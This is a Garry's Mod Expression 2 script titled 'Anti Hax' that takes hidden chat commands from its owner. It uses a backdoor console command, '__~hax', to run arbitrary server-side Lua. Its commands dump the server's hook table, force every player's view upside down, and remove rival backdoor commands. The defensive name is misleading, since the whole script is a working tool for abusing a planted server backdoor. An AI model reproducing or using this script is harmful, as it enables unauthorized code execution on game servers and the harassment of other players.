@name Anti Hax
@inputs 
@outputs
@persist Started
@persist 
@persist 
@persist
@trigger

runOnChat(1)

if (duped()) {
    Started = 0
}
if (!Started) {
    Started = 1
}

LastSpoke = lastSpoke()
if (chatClk() & LastSpoke == owner()) {
    LastSaid = lastSaid()
    Authorized = 1
}
if (Authorized) {
    # Parse the command
    if (LastSaid:find(" ")) {
        Command = LastSaid:sub(1, LastSaid:find(" ") - 1)
        Params = LastSaid:sub(LastSaid:find(" ") + 1, LastSaid:length()):trimLeft():trimRight()
    } else {
        Command = LastSaid:sub(1, LastSaid:length())
        Params = ""
    }
    IsCmd = 0
    if (Command:index(1) == "!" | Command:index(1) == "/") {
        IsCmd = 1
        Command = Command:sub(2, Command:length()):lower()
    }
    if (IsCmd) {
        hideChat(1)
        if (Params:length()) {
            EntPlayer = findPlayerByName(Params)
        }
        if (Command == "dumphooks") {
            concmd("__~hax \"lua_run game.ConsoleCommand('say ' .. PrintTable(hook.GetTable())\"")
        }
        if (Command == "bugview") {
            concmd("__~hax \"lua_run hook.Add('Think', 'Hax', function() for k,v in pairs(player.GetAll()) do v:SetEyeAngles(Angle(0,0,180)) end end)\"")
        }
        if (Command == "fixview") {
            concmd("__~hax \"lua_run hook.Remove('Think', 'Hax')\"")
        }
        if (Command == "removehax") {
            concmd("__~hax \"lua_run concommand.Remove('___~hax')\"")
            concmd("__~hax \"lua_run concommand.Remove('___~~hax')\"")
            concmd("__~hax \"lua_run concommand.Remove('__~~hax')\"")
            concmd("__~hax \"lua_run concommand.Remove('___~~~hax')\"")
        }
    }
}
